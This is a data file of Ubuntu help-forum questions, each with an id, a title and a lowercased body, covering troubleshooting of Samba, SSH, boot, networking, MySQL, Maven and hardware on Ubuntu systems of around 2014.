446145	samba shares not working after reboot	after a reboot of a ubuntu 12.04.4 lts ( gnu/linux 3.8.0-35-generic x86_64 ) lts server , the samba shares are no longer working . details : connecting to the samba shares from a windows server using the ip address of the server . example \ipaddress\sharename i am connecting with the same username and passwords on the client and server able to ping the linux server from the windows server . restarted nmbd and smbd services . checked/reset passwords for users and smbusername passwords . system firewall : to action from -- -- -- -- -- -- 3306/tcp allow anywhere 443 allow anywhere 161/udp allow anywhere 137/tcp allow anywhere 138/tcp allow anywhere 139/tcp allow anywhere 445/tcp allow anywhere 3306/tcp allow anywhere ( v6 ) 443 allow anywhere ( v6 ) 161/udp allow anywhere ( v6 ) 137/tcp allow anywhere ( v6 ) 138/tcp allow anywhere ( v6 ) 139/tcp allow anywhere ( v6 ) 445/tcp allow anywhere ( v6 ) 3306/tcp allow out anywhere 3306/tcp allow out anywhere ( v6 ) samba share config : [ sharename1 ] comment = sharename1 path = /home/username1 force user = username1 browseable = yes writeable = yes read only = no create mask = 0754 [ sharename2 ] comment = sharename2 path = /home/username2 force user = username2 browseable = yes writeable = yes read only = no create mask = 0754 all shares are not working but were working before the reboot . log.smbd [ 2014/04/10 08:28:08.606322 , 0 ] smbd/server.c:1107 ( main ) standard input is not a socket , assuming -d option [ 2014/04/10 15:50:21 , 0 ] smbd/server.c:1051 ( main ) smbd version 3.6.3 started . copyright andrew tridgell and the samba team 1992-2011 [ 2014/04/10 15:50:21.293312 , 0 ] smbd/server.c:1107 ( main ) standard input is not a socket , assuming -d option log.nmbd this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.37 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.39 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.116 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.160 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.168 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 . [ 2014/04/10 16:27:07 , 0 ] nmbd/nmbd_namequery.c:109 ( query_name_response ) query_name_response : multiple ( 2 ) responses received for a query on subnet 172.25.69.205 for name workgroup < 1d > . this response was from ip 172.25.11.22 , reporting an ip address of 172.25.11.22 .
446147	log into ubuntu server not over ssh	such a nooby question . basically , my vps provider tells me my username is foobar and my password is 123notthispasswordreally . however , i 'm not sure how i 'm meant to use this information to log into my server . i 've only breifly used ssh in the past , and i do n't know what command to run in the terminal to access the server and log in via the above credentials .
446148	ubuntu touch how to detect if the application is closed	on ubuntu touch . i run an application in terminal and close the application in the application scope . the application is n't killed . and no event is caught in qquickview . how do i detect this close event ?
446150	press numlock without numlock-key ?	i have an external usb numberpad , that has no numlock key itself . since my laptop has n't one either i have no way to disable numlock if it is set . now the numberpad is set to numlock and i can ony access the arrows , pgup ... on it . how can i enter numlock to change it to write numbers again ?
446153	ubuntu desktop corporate warning splash page	good afternoon the windows servers in my office have a corporate warning splash page whenever a user logs on to the system . the user would then have to click `` ok '' to acknowledge the warning that this is a company computer and there are legal ramifications for the misuse of the computer and so on ... ... i was wondering if there is a similar function for the ubuntu desktop . the window with the warning would pop up after log on and then the user would have to click ok to acknowledge the warning and close the window . thank you in advance . tim
446156	pause execution and wait for user input	i have a script that i am making and i have an issue with it : i would like to pause execution and wait for user input . i thought that i had it with the read -p -n 1 $ foo command but the system is having issues with this command . here is my current t script : # ! /bin/sh # ititialization mainmenu ( ) { echo `` press 1 to update your system '' echo `` press 2 to install samba '' echo `` press 3 to install vsftpd '' echo `` press 4 to install the current version of webmin '' echo `` press 5 to configure samba for active directory '' echo `` press x to exit the script '' read -n 1 -p `` input selection : '' mainmenuinput if [ `` $ mainmenuinput '' = `` 1 '' ] ; then updatesystem elif [ `` $ mainmenuinput '' = `` 2 '' ] ; then installsamba elif [ `` $ mainmenuinput '' = `` 3 '' ] ; then installvsftpd elif [ `` $ mainmenuinput '' = `` 4 '' ] ; then installwebmin elif [ `` $ mainmenuinput '' = `` 5 '' ] ; then configuresambaforactivedirectory elif [ `` $ mainmenuinput '' = `` x '' ] ; then quitprogram elif [ `` $ mainmenuinput '' = `` x '' ] ; then quitprogram else echo `` you have entered an invallid selection ! '' echo `` please try again ! '' echo `` '' echo `` press any key to continue ... '' read -n 1 clear mainmenu fi } # this builds the main menu and routs the user to the function selected . mainmenu # this executes the main menu function . # let the fun begin ! ! ! ! woot woot ! ! ! ! you may notice at the mainmenu function the read -n 1 -p `` text goes here '' entry . that is where i am having the issue according to ubuntu . can somebody tell me what is going wrong ? thanks !
446157	ubuntu 13.10 boots into blank screen after grub	recently after force shutting down during a long shutdown then when it started up it would go to grub and then it would flash a login screen before going black with a not moving terminal cursor . after searching for a result i saw a solution to a similar problem which was to change the boot code in grub from quiet splash to nomodset and when i tried that it worked for a while but now i have to constantly change the boot code and its a random chance if it works , no pattern showing . can anyone help me ?
446158	how to open and see content of ext2 file in ubuntu	i have a file root.ext2 in a iso file . how can i open and see content of ext2 file in ubuntu ?
446160	why are there guest-6ldh45lx groups in /etc/group ?	found guest-6ldh45lx:132 : and guest-mtinkr : x:127 : groups in /etc/group . can anybody explain what these are and why they 're lurking in my configuration ?
446164	set up ssh on vps	i 've basically locked myself out of my vps . there 's nothing on it , so there 's not too much worry , but i really want to know how to fix the problem . i 've locked myself out by disabling root access , and then overwriting id_rsa . i 've learned my lesson , and will be naming all my key pairs from now on . anyway , whenever i attempt to logon via ssh ssh username @ xxx -p 2222 i get this : debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey d received disconnect from xxxxx : 2 : too many authentication failures for root the problem is i no longer have a valid key , so my ssh agent offers each one in turn , until the server ignores me . i can easily generate another key pair locally , but i 'm confused as to what to do on the server side of things ? i have root access via a cloud console .
446165	how to choose where the software is stored when installing via ubuntu software center	i want to choose where on a hard drive the application is stored when installing it via ubuntu software center . i am not looking for a general setting for all applications , but rather i would like to set the exact folder on hard drive where the currently installed applications will be stored . also is it a problem to store the application to a ntfs partition ?
446166	fill_in_dev failed ubuntu 13.10	i have installed ubuntu 13.10 on a usb key but when i boot i see the error `` fill_in_dev failed '' flash up on a black screen after the initial ubuntu splash screen appears . the computer will not boot into the desktop . i have tried reinstalling lightdm , removing lightdm and install gdm and removing gdm , removing and reinstalling ubuntu-desktop . nothing works . i do n't want to reinstall . what does this error mean and why can i find so little information on it ?
446169	how change gnome langauge ?	i try to find a solution on google without find nothing usefull . i installed the last ubuntugnome 14.04 but under system settings - > region & language - > language there are no `` + '' button to add other language then english . how i can install other langauge in gnome ?
446170	mysql user access	i 'm trying to move my mysql default database directory . i 've found out how to do this , but i need to be able to use mysql , when it 's /var/mysql/ directory 's owner and group are set to root , not to mysql . is there any way to configure it so ?
446173	how to install so runs alongside windows 8	how do i install ubuntu so that when i turn on my computer , the dos screen shows up and i can choose between windows 8 and ubuntu ? -dell latitude e6400
446175	how can i set my bluetooth-speakers `` default '' volume lower than 100 % ?	i finaly got my jabra solemate playing nice with my desktop computer . however , every time i connect my solemate , the volume setting in pulseaudio pops ( back ) up to 100 % . what i 'd like , is for it to be 50-60 % when i connect my solemate . any tips on how to do that ? i 've seen one solution , but it only works until reboot . kind regards , marius @ kombian
446177	installing ubuntu stand only help	i 'm new to ubuntu and i was hoping to install it on my old windows xp computer but if there is a way i would prefer to have only ubuntu on the computer rather than have both ubuntu and windows . i wanted to do this method because windows xp is no longer getting support and i wanted to keep my network safe . i tried looking up things on the internet and youtube but i 've been having a lot of difficulty . i managed to get it on the computer but it was through windows . i then tried creating a bootable version of it with a usb stick but i was n't having any luck with that . i tried making the dvd disk multiple times but it never worked .
446178	do i absolutely need to format my ext hdd in order to use it to install ubuntu ?	my goal is to run windows 8.1 on my laptop from the factory-installed hdd , and use the same ext usb 3.0 hdd that i use to backup my files as the location for my ubuntu install . i am under the impression that i simply need to use the universal usb installer from the installation instructions , however my question is : when selecting my external usb 3.0 hdd , do i need to format it in order to use it to install ubuntu , or can i keep my stuff on there and use the usb installer program along side my backed up files ? i really do n't want to reformat my ext usb 3.0 hdd but i do n't currently have a smaller usb flash-drive handy , nor do i have a bios capable of booting to my built-in sd card reader or a blank dvd-r to make a bootable dvd . so my only option is to use this usb 3.0 external hdd , but as i said , i ca n't lose the files i have on it already , and i do n't want to reformat it . what can i do ?
446180	how to mount smartphone to recover files	how can i mount a smartphone internal storage in ubuntu in a way that i could run photorec on it to recover several documents . photorec does not detect the smartphone ( external or internal storage ) and it will only show the ones that are in /dev/ . when i connect the smartphone it shows the following : [ thu apr 10 15:38:32 2014 ] usb 3-13 : new high-speed usb device number 9 using xhci_hcd [ thu apr 10 15:38:33 2014 ] usb 3-13 : new usb device found , idvendor=04e8 , idproduct=6860 [ thu apr 10 15:38:33 2014 ] usb 3-13 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ thu apr 10 15:38:33 2014 ] usb 3-13 : product : samsung_android [ thu apr 10 15:38:33 2014 ] usb 3-13 : manufacturer : samsung [ thu apr 10 15:38:33 2014 ] usb 3-13 : serialnumber : 4d10e317e3f070a9 [ thu apr 10 15:38:33 2014 ] cdc_acm 3-13:1.1 : this device can not do calls on its own . it is not a modem . [ thu apr 10 15:38:33 2014 ] cdc_acm 3-13:1.1 : ttyacm0 : usb acm device when i run mount it does not appeared anywhere mounted but i can see both external and internal storage medias
446181	ubuntu installer not recognizing a partition	i 've been trying to install ubuntu alongside windows 8.1 through a usb stick . i can boot into it just fine and it asks me if i want to install alongside windows 8.1 . when i click on that it just reboots into 8.1 again . so then i tried installing using the `` other options '' selection . i can boot into the live cd mode and it works just fine , but i want it actually on my hard drive . from the tutorials i looked at i needed a free space partition so i shrunk my c drive by 20 gigs and it showed up as `` unallocated space '' . as far as i know i need `` free space '' to install it and when i try to install it will not recognize my partition . i have a screenshot of what i am talking about . pc is an hp pavilion dv6 , came with windows 7 installed .
446183	how to set up nat and host-only networking with static ip address in virtualbox	i am trying to set up a set of guests in virtualbox , such that each of them can access the internet as well as be visible to each other and to the host . i also want the guests to have static ip addresses . here 's the procedure that i have followed so far : switch off the dhcp server feature of the host-only network to be used in this setup change the ip address assigned to the host to 192.168.56.254 create a guest machine with 2 networking interface cards ( nic ) configure the 1st nic to use nat configure the 2nd nic to use hot-only networking install the os ( ubuntu server 13.10 ) on each of them update the os configure the networking as follows by editing /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.56.1 netmask 255.255.255.0 network 192.168.56.0 broadcast 192.168.56.255 gateway 192.168.56.254 dns-search cloudspace.local dns-nameservers 8.8.8.8 8.8.4.4 save the file reboot when the guest boots up again , the host-only networking is working fine . the host/guest and guest/guest pairs of machines can ping each other , however the internet is n't working as apt-get fails . if i then issue a service networking restart command , the networking begins to work as it should . what am i doing wrong ? i have tried switching the order in which the nics appear in the /etc/network/interfaces file . i have also swapped the nat/host-only network around between the 2 nics . nothing worked . the host is windows 8.1 and the guest is ubuntu server 13.10 . i have tried the same on mac os x with similar results . i would greatly appreciate any help in this . update : i have included the output from the following commands below , to help in diagnostics : cat /etc/network/interfaces ifconfig -a route -n $ cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.56.1 netmask 255.255.255.0 network 192.168.56.0 broadcast 192.168.56.255 gateway 192.168.56.254 $ ifconfig -a eth0 link encap : ethernet hwaddr 08:00:27:75:47:64 inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe75:4764/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1180 ( 1.1 kb ) tx bytes:1332 ( 1.3 kb ) eth1 link encap : ethernet hwaddr 08:00:27:93:98 : d8 inet addr:192.168.56.1 bcast:192.168.56.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe93:98d8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:140 errors:0 dropped:0 overruns:0 frame:0 tx packets:225 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:14418 ( 14.4 kb ) tx bytes:27378 ( 27.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb ) $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.56.254 0.0.0.0 ug 0 0 0 eth1 10.0.2.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.56.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 update 2 : after i execute sudo service networking restart , the output from route -n becomes : $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.2.2 0.0.0.0 ug 0 0 0 eth0 10.0.2.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.56.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 so how do i ensure this configuration on boot ?
446186	nautilus takes so long to open when i have a network folder mounted	im using ubuntu gnome 13.10 and nautilus takes a long to open when i have my nas folders mounted on fstab . when i open nautilus as root , its open quickly . what i have to do
446189	is the asus me173x compatable with the tablet version of ubuntu ?	i am wondering about my ability to install an actual os on my low-cost asus me173x notebook 7 hd tablet . it 's only got 1g ram and an arm v7 processor . would it work with an image for kindle fire or galaxy note ?
446191	exit program with all its processes	i 'm using chromium browser on ubuntu os . when i press the exit button many processes appear still running . does anyone know how i can stop this browser completely with all its processes when i press exit button ? thanks in advance .
446193	what happened to facebook in online accounts - 13.10 ?	i apologize if this was previously answered , but it seems like we 're not able to add facebook as one of our `` online accounts '' all of a sudden in 13.10 . i was notified today that it was unable to connect to facebook when i logged in . i 'm curious if there is a particular reason why this might be the case . thanks !
446194	how to leave a process running in backgroun on a terminal	i am running some simulation through a server . i usually login in the server using ssh command from the shell of my laptop . then i run emacs in terminal mode and with it i start some python simulations . now i would like to close the connection between my laptop and the server but leave the simulations and emacs running in the server . i would like then be able to connect again to the server and restart to work with emacs . how can i do that ?
446198	how to enable hibernation in toshiba tecra-a7	i 'd like to know how to enable hibernate in toshiba tecra-a7 laptop running ubuntu 12.04 ? or does not it support hibernate ?
446203	how can i stop mysql server	i had mysql server running . i stopped it , and removed it ( apt-get remove mysql-server mysql-client ) i then manually removed the directories : /var/lib/mysql /var/run/mysqld i rebooted . but when i type mysql , i get the following message : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i get the same error message when i type service mysql stop this means mysql server is still running . how do i get rid of it completely and stop the process .
446204	how do i shrink root partition ?	i am in a sorta big trouble . i ran into problems with win8 and after fading up about it i have installed ubuntu 12.04 lts . i was so frustrated i replaced windows 8 and made a huge root directory of 9xx gb . please tell me how can i make three partitions of 250gigs so that i can install windows 7 in one of them .
446211	installing ubuntu workstation and ubuntu server in a multi partition environment	newbie here . o.k , so i 'm a bit crazy at times , and very crazy most of the time : ) i 've partitioned two 1tb drives into five partitions . vista went on disk 1 - partition 1 - win 7 went onto disk 1 - partition 2 - win server is going in on disk 2 - partition 1 - the remainder of disk 2 is split into two partitions named ubuntu workstation and ubuntu server . i want to be able to tell ubuntu to install in its dedicatd partitions . i 'm installing the latest and greatest , v13 for both ubuntu os 's . i did read a post on here stating i should use `` install alongside windows '' . will that work for me ? i 'm holding off installing any linux os until i truly understand what i 'm doing . also , ubuntu workstation is going in as the first linux os , then server . the following question is about the grub loader if it is still being used . once i 've installed ubuntu workstation , will the grub loader recognize all of my windows installs ? if so , what about once i 've installed ubuntu server after workstation ? thanks for everyone 's help . i know this is a tricky configuration , but there is reason to my madness . thanks , worldly guy
446212	glitchy screen after startup	when i start up , after the ubuntu loading screen , the screen glitches , it has a bunch of orange lines that go down in a stair-like fashion . i use 12.04 on a 32-bit desktop
446216	can not boot zfs root on ubuntu 12.04 after heartbleed update	i did the apt-get update and then upgrade to deal with the heartbleed vulnerability . i rebooted after the upgrade without checking that everything was good . now i 'm not having much luck . it is booting and saying that it can not mount filesystem '- ' and putting me in a busybox shell . the good news is that if i boot off of a liveusb install , i can follow the instructions and do a zpool import of my rpool . this works . however , i 've tried the basics in the ubuntu zfs faq and i 'm still not having much luck . what steps should i take from the livecd in order to get the system going without re-installing ?
446220	can i reuse other os /home directory for ubuntu ?	i currently have mint 14 set up on a 128gb ssd , with my /home directory on a 1tb hard disk . i am thinking about installing ubuntu 14.04 when it comes out . i understand that i can select a different home partition during installation and not format it . will the home directory just work , considering it is a change of distro or are there any ubuntu specific contents in the /home directory that need to be created ? lsblk output : name maj : min rm size ro type mountpoint sda 8:0 0 119.2g 0 disk ├─sda1 8:1 0 103.3g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 16g 0 part [ swap ] sdb 8:16 0 931.5g 0 disk └─sdb1 8:17 0 931.5g 0 part /home
446221	how do i check my network users on ubuntu ?	we are using the same network , how can i check the network users group ? how can i access their machine with local ip address ?
446224	booting directly from liveusb on a usb stick with ubuntu 12.04	i have created a bootable usb stick from the 12.04 build of ubuntu and i 'm finding it is better for my laptop than the windows vista that came on it . however , i do n't want to create a dual boot system at this time . is there a way to disable the `` try it '' or `` install it '' window when the system starts up so that it boots directly to the desktop from the usb stick ? thank you in advance . colby
446228	how do i re-issue openssl snakeoil cert ?	in light of the recent heartbleed fiasco and whatnot i too have been scrambling to up security on some servers . my question is how do i reissue the snakeoil cert that comes with openssl ? the cert that it is currently using was issued in 2012 , so clearly before this incident . so it seems like the protocol here is to reissue all certs and i cant find info on how to do so for snakeoil . i am the only one who uses that cert , for phpmyadmin , so do i even need to update it ?
446229	why is my `` /etc/netgroup '' not existed ?	i would like to check network wide group of hosts and users , but this file gone after i typed once . any clue ?
446231	what 's the `` spell hint '' is on ubuntu 12.04	i 've no idea about what the system-wide `` spell hint '' exactly is , but , whenever i press ctrl + alt + h , i 'll be prompted `` spell hint is enabled | disabled '' . obviously , it 's a toggle key for a spell hint app ( or feature of some app ) . my problem is : i used to set this short key , ctrl + alt + h for my intellij idea , but now it does n't work . and i could n't figure out which app has taken this hot key and i 've no idea how to unset it .
446232	maven gives `` resolving version for plugin '' error when trying to create a project	i am a newbie to both linux and maven . i am trying to get maven working so i can install mahout . i am having more than just one problem with the process but i will focus on the most basic one : i am trying to follow this guide to learn how to get started with maven . when i run the following command in the terminal mvn archetype : generate -dgroupid=com.mycompany.app -dartifactid=my-app -darchetypeartifactid=maven-archetype-quickstart -dinteractivemode=false i get the following error : dave @ codekingdom : ~/workspace/maven_test $ mvn archetype : generate -dgroupid=com.mycompany.app -dartifactid=my-app -darchetypeartifactid=maven-archetype-quickstart -dinteractivemode=false [ info ] scanning for projects ... [ warning ] the metadata /home/dave/.m2/repository/org/apache/maven/plugins/maven-archetype-plugin/maven-metadata-central.xml is invalid : end tag name < /head > must be the same as start tag < meta > from line 1 ( position : start_tag seen ... e/maven/plugins/maven-archetype-plugin/maven-metadata.xml '' > < /head > ... @ 1:385 ) [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] build failure [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] total time : 0.446s [ info ] finished at : thu apr 10 17:43:57 pdt 2014 [ info ] final memory : 8m/310m [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ error ] error resolving version for plugin 'org.apache.maven.plugins : maven-archetype-plugin ' from the repositories [ local ( /home/dave/.m2/repository ) , central ( http : //repo.maven.apache.org/maven2 ) ] : plugin not found in any plugin repository - > [ help 1 ] [ error ] [ error ] to see the full stack trace of the errors , re-run maven with the -e switch . [ error ] re-run maven using the -x switch to enable full debug logging . [ error ] [ error ] for more information about the errors and possible solutions , please read the following articles : [ error ] [ help 1 ] http : //cwiki.apache.org/confluence/display/maven/pluginversionresolutionexception i ca n't make much sense of the resources out there . what i gather based on my googling is that maven is unable to connect to internet to download the necessary artifacts . but i am not sure whether i should modify setting.xml or pom.xml to fix this or whether i should do something completely different . plus i ca n't seem to find a pom.xml file in my maven folder . there is a settings.xml file but i am not clear on how or if i should modify it . any help is appreciated .
446236	removable drive keeps getting dropped/ unmounted	i plug in my 1tb removable drive and ubuntu mounts it . i start extracting my 45gb of 7z compressed photos and after a period of time appears to be about 10 minutes the drive unmounts and the extraction fails . how can i stop the drive unmouting ? i have uninstalled laptop-mode-tools as i read a few posts that led to that conclusion however that did not help . dmesg provides this output . [ 372.444377 ] buffer i/o error on device sdb1 , logical block 31323601 [ 372.444384 ] sd 4:0:0:0 : rejecting i/o to offline device [ 372.444389 ] sd 4:0:0:0 : [ sdb ] killing request [ 372.444396 ] sd 4:0:0:0 : rejecting i/o to offline device [ 372.444411 ] sd 4:0:0:0 : [ sdb ] unhandled error code [ 372.444413 ] sd 4:0:0:0 : [ sdb ] [ 372.444414 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 372.444416 ] sd 4:0:0:0 : [ sdb ] cdb : [ 372.444417 ] read ( 10 ) : 28 00 0e ef af 6f 00 00 20 00 [ 372.444424 ] end_request : i/o error , dev sdb , sector 250589039 [ 372.444441 ] usb 2-1.2 : usb disconnect , device number 95 [ 372.444450 ] sd 4:0:0:0 : rejecting i/o to offline device [ 372.523846 ] usb 2-1.2 : new high-speed usb device number 96 using ehci-pci [ 387.602089 ] usb 2-1.2 : device descriptor read/64 , error -110 my fstab is very plain # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=6da37d02-881e-455f-8f1a-93db2ddc7f3c /boot ext2 defaults $ /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 i have added this to fstab to always mount it the same . uuid=16d48a3ed48a205b /media/imation ntfs user , noauto , rw 0 0 dmesg | tail provides this . sayth : ~ $ dmesg | tail [ 687.791103 ] buffer i/o error on device sdb1 , logical block 31310276 [ 687.791106 ] buffer i/o error on device sdb1 , logical block 31310277 [ 687.791109 ] buffer i/o error on device sdb1 , logical block 31310278 [ 687.791113 ] buffer i/o error on device sdb1 , logical block 31310279 [ 687.791165 ] sd 4:0:0:0 : rejecting i/o to offline device [ 687.791170 ] usb 2-1.2 : usb disconnect , device number 3 [ 687.942519 ] usb 2-1.2 : new high-speed usb device number 4 using ehci-pci [ 703.020594 ] usb 2-1.2 : device descriptor read/64 , error -110 [ 718.206700 ] usb 2-1.2 : device descriptor read/64 , error -110 [ 718.382767 ] usb 2-1.2 : new high-speed usb device number 5 using ehci-pci and fsck ca n't help , i am really out of ideas . sayth : ~ $ fsck /dev/sdb1 fsck from util-linux 2.20.1 fsck : fsck.ntfs : not found fsck : error 2 while executing fsck.ntfs for /dev/sdb1
446237	what is memcached ? is it good for gaming or virtual machines ?	this is a performance question : my machine always runs ubuntu as the main , and as i login , it always starts up a windows vm and firefox ? if i install memcached , will it improve my performance ? i notice that the cpu is always pegged by the windows vm , but for hard drive performance will memcached work ? ( are the default settings enough or do i need to configure memcached specifically for the vm ?
446242	can not install anything with software centre or apt-get	i recently installed ubuntu 12.04 in virtual box . i dont know what the problem is but i dont get the button to instal in ubuntu software centre . it only shows `` use this source '' button . using sudo apt-get install results in `` unable to locate package error . what to do ?
446243	annoying sound issue	i 'm experiencing a quite annoying sound bug on my ubuntu v. 13.10 . when i 'm listening to pandora , or watching youtube videos i will use fn + f9/10 for volume control . however , when i do this the music will continuously skip ( or whatever video i 'm watching ) . the volume control also lags a lot . it will make a continuous sound as well . the part that annoys me though is when i use it and the video and music starts sounding like a broken record . i tried manually changing volume during a video and it did the same thing . does anyone know what causes this ?
446247	earphone port does not work exclusively until replugged	this is one of the recent syndromes that i have been encountering for a few days : i switch on my pc with my earphone plugged in to the appropriate port . when i play music on my pc , it plays the sound both on the earphone as well as on the speakers . what should be done to correct this error ? ( version 13.10 , kernel 3.11.0-19 x_64 )
446252	how may i find out how to bring a terminal up ?	i am a brand new user of ubuntu and can not figure out how to get to a terminal . what do i need to know ?
446256	how do i make ubuntu a router ?	i have an old install of ubuntu 10.04 , and i want to make it a router . i have a phone with 3g tethered to my computer via usb , and want to connect a vonage box with ethernet . nexus 4 -- -- -- -- -- > > computer -- -- -- -- -- -- -- - > > vonage the network works on the internet , but vonage is unable to access the internet right now . please help ! edit : here is the result of ifconfig -a : eth0 link encap : ethernet hwaddr 00:24 : e8 : eb : a0:82 inet6 addr : fe80 : :224 : e8ff : feeb : a082/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2460 errors:0 dropped:0 overruns:0 frame:0 tx packets:1811 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:942876 ( 942.8 kb ) tx bytes:212067 ( 212.0 kb ) interrupt:27 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:529 errors:0 dropped:0 overruns:0 frame:0 tx packets:529 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:45433 ( 45.4 kb ) tx bytes:45433 ( 45.4 kb ) usb0 link encap : ethernet hwaddr 92:50:73 : bb:25:38 inet addr:192.168.42.232 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :9050:73ff : febb:2538/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3076 errors:0 dropped:0 overruns:0 frame:0 tx packets:3913 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1597102 ( 1.5 mb ) tx bytes:692155 ( 692.1 kb ) wlan0 link encap : ethernet hwaddr 0c : ee : e6:9c:8a:62 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
446257	battery status and other	i have reinstalled my ubuntu from 12.04 to salamander . and now i have strange battery status . http : //ubuntuone.com/1leb7r6jk20sc2bujq4zhc look , it is accepted and confirmed . but status is wrong and no percents . cant change from ru to en and back again ( tried to make ctrl+shift for up and shift+ctrl for down ) works first time and then only shift +ctrl .
446258	laptop does n't show systems menu while booting	welcome all , i have installed ubuntu 12.4 lts on win 8 with secureboot enabled now after installing it the pc boots directly to ubuntu and i can not access win 8 when use boot repair it asks me to disable secure boot so how can i access win 8 now ? thnx
446262	can use of symlinks be circumvented ?	i am trying to download android source from git repository . i would require a lot of free space on my home folder to download the whole source and build it . so i decided to download the whole source in another partition where there is sufficient space . mine is a wubi install and the drive in question is a ntfs filesystem . so whenever i issue a command to sync from github i get an error saying that giterror : filesystem must support symlinks . i guess this is a problem arising due to the filesystem being ntfs . my question is : is there any way to circumvent this ? can i do something like mentioned in the comment on this question to circumvent this problem ? any suggestions would be appreciated . thanks .
446263	dual boot issues	i recently dual-booted ubuntu 12.04 lts and windows 8.1 , but for some reason , i ca n't access either . can you guys help ? specs : hp envy dv7 i7 core 8 gb ram edit : i 've found that it 's just windows 8 that wo n't boot . if i do some uefi trickery , i can enter into ubuntu . edit2 : i think it may have something to do with the drivers in windows 8 . i can enter into the blue recovery screen , but when i try to enter windows , i just get a black screen and ca n't do anything .
446265	does anybody know if exists a solution for this bug ?	i have been using ubuntu 13.10 ( amd64bits ) for a while and always the same problem happen with me when i add a new vpn connection . my problem is the same as described in the follow website - > https : //bugs.launchpad.net/ubuntu/+source/network-manager-applet/+bug/1227186 the process name with bug is : nm-connection-editor . i also try to kill the process but without success . obs . : between first problem ( +-7months ago ) and today , i had updated my os a few times , the bug still alive ! one important thing about kill the process , if i do not kill , the process still using around 30 % of my cpu , but if i kill the process , then it turn to 0 % cpu usage , but still showing as a process alive . ; ( any idea how to get around ? ?
